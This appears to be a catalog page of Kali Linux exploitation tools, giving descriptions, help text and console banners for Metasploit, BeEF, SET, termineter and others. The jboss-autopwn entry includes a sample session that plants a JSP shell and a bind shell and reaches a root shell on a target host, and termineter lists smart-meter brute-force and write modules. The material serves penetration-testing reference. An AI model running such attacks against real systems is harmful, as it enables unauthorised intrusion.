Kali tools catalog - Exploitation Tools

BeEF XSS Framework

beef

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

beef

Exploit Database

searchsploit

Exploit Database Archive Search

Usage: searchsploit [options] term1 [term2] ... [termN]
Example: searchsploit oracle windows local

=========
 Options 
=========
   -c            Perform case-sensitive searches; by default, searches will
                 try to be greedy
   -h, --help    Show help screen
   -v            By setting verbose output, description lines are allowed to
                 overflow their columns

=======
 NOTES 
=======
 * Use any number of search terms you would like (minimum: 1)
 * Search terms are not case sensitive, and order is irrelevant

Exploit Development Tools

edb-debugger

A Linux equivalent of the famous Olly debugger on the Windows platform. Some of its features are:

Intuitive GUI interface
The usual debugging operations (step-into/step-over/run/break)
Conditional breakpoints
Debugging core is implemented as a plugin so people can have drop in replacements. Of course if a given platform has several debugging APIs available, then you may have a plugin that implements any of them.
Basic instruction analysis
View/Dump memory regions
Effective address inspection
The data dump view is tabbed, allowing you to have several views of memory open at the same time and quickly switch between them.
Importing and generation of symbol maps
Plugins

edb

NASM shell

This tool provides an easy way to see what opcodes are associated with certain x86 instructions by making use of nasm if it is installed and reachable through the PATH environment variable.

ollydbg

OllyDbg is a 32-bit assembler level analysing debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.

Features:

Intuitive user interface, no cryptical commands
Code analysis – traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
Directly loads and debugs DLLs
Object file scanning – locates routines from object files and libraries
Allows for user-defined labels, comments and function descriptions
Understands debugging information in Borland® format
Saves patches between sessions, writes them back to executable file and updates fixups
Open architecture – many third-party plugins are available
No installation – no trash in registry or system directories
Debugs multithread applications
Attaches to running programs
Configurable disassembler, supports both MASM and IDEAL formats
MMX, 3DNow! and SSE data types and instructions, including Athlon extensions
Full UNICODE support
Dynamically recognizes ASCII and UNICODE strings – also in Delphi format!
Recognizes complex code constructs, like call to jump to procedure
Decodes calls to more than 1900 standard API and 400 C functions
Gives context-sensitive help on API functions from external help file
Sets conditional, logging, memory and hardware breakpoints
Traces program execution, logs arguments of known functions
Shows fixups
Dynamically traces stack frames
Searches for imprecise commands and masked binary sequences
Searches whole allocated memory
Finds references to constant or address range
Examines and modifies memory, sets breakpoints and pauses program on-the-fly
Assembles commands into the shortest binary form
Starts from the floppy disk

ollydbg

pattern create

Generate a string composed of unique patterns

root@kali:/usr/share/metasploit-framework/tools# ./pattern_create.rb 25
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7A

pattern offset

Find the offset in an exploit string where your address to overwrite EIP should be

Usage: pattern_offset.rb <search item> <length of buffer>
Default length of buffer if none is inserted: 8192
This buffer is generated by pattern_create() in the Rex library automatically

Metasploit

World’s most used penetration testing software…the hacker’s best friend. No further description needed

root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...|
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.pro


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]]
+ -- --=[ 1399 exploits - 788 auxiliary - 224 post        ]
+ -- --=[ 356 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 

Network Exploitation

armitage

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:

Use the same sessions
Share hosts, captured data, and downloaded files
Communicate through a shared event log.
Run bots to automate red team tasks.

Armitage organizes Metasploit’s capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver.

armitage

exploit6

Performs exploits of various CVE known IPv6 vulnerabilities on the destination

exploit6 v2.5 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org

Syntax: exploit6 interface destination [test-case-number]

Performs exploits of various CVE known IPv6 vulnerabilities on the destination
Note that for exploitable overflows only 'AAA...' strings are used.
If a system is vulnerable, it will crash, so be careful!

ikat

iKAT is designed to provide access to the underlying operating system of a Kiosk terminal by invoking native OS functionality.

jboss-autopwn

This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.

Features include:

Multiplatform support – tested on Windows, Linux and Mac targets
Support for bind and reverse bind shells
Meterpreter shells and VNC support for Windows targets

Example from the homepage:

Linux bind shell:

[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully in /tmp
[x] Now deploying .war file:
http://192.168.1.2:8080/browser/browser/browser.jsp
[x] Running as user...:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[x] Server uname...:
 Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
[!] Would you like to upload a reverse or a bind shell? bind
[!] On which port would you like the bindshell to listen on? 31337
[x] Uploading bind shell payload..
[x] Verifying if upload was successful...
-rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload
[x] You should have a bind shell on 192.168.1.2:31337..
[x] Dropping you into a shell...
Connection to 192.168.1.2 31337 port [tcp/*] succeeded!
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
python -c 'import pty; pty.spawn("/bin/bash")'
[root@nitrogen /]# full interactive shell :-)

termineter

Termineter is a framework written in python to provide a platform for the security testing of smart meters. It implements the C12.18 and C12.19 protocols for communication. Currently supported are Meters using C12.19 with 7-bit character sets. Termineter communicates with Smart Meters via a connection using an ANSI type-2 optical probe with a serial interface.

root@kali:~# termineter

   ______              _          __         
  /_  __/__ ______ _  (_)__  ___ / /____ ____
   / / / -_) __/  ' \/ / _ \/ -_) __/ -_) __/
  /_/  \__/_/ /_/_/_/_/_//_/\__/\__/\__/_/   

  <[ termineter                     v0.1.0
  <[ model:                          T-800
  <[ loaded modules:                    12

termineter > show modules

Modules
=======

  Name               Description
  ----               -----------
  brute_force_login  Brute Force Credentials
  dump_tables        Dump Readable C12.19 Tables From The Device To A CSV File
  enum_tables        Enumerate Readable C12.19 Tables From The Device
  get_info           Get Basic Meter Information By Reading Tables
  get_log_info       Get Information About The Meter's Logs
  get_modem_info     Get Information About The Integrated Modem
  get_security_info  Get Information About The Meter's Access Control
  read_table         Read Data From A C12.19 Table
  run_procedure      Initiate A Custom Procedure
  set_meter_id       Set The Meter's I.D.
  set_meter_mode     Change the Meter's Operating Mode
  write_table        Write Data To A C12.19 Table

termineter > 

Social Engineering Toolkit

The Social-Engineer Toolkit is an open-source penetration testing framework designed for Social-Engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time.

      _______________________________
     /   _____/\_   _____/\__    ___/
     \_____  \  |    __)_   |    |
     /        \ |        \  |    |
    /_______  //_______  /  |____|
            \/         \/            

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
[---]                  Version: 6.3                    [---]
[---]              Codename: '#HugLife'                [---]
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]

    Welcome to the Social-Engineer Toolkit (SET). 
     The one stop shop for all of your SE needs.

 Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

         Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 

Core dump overflow

Core dump in progress...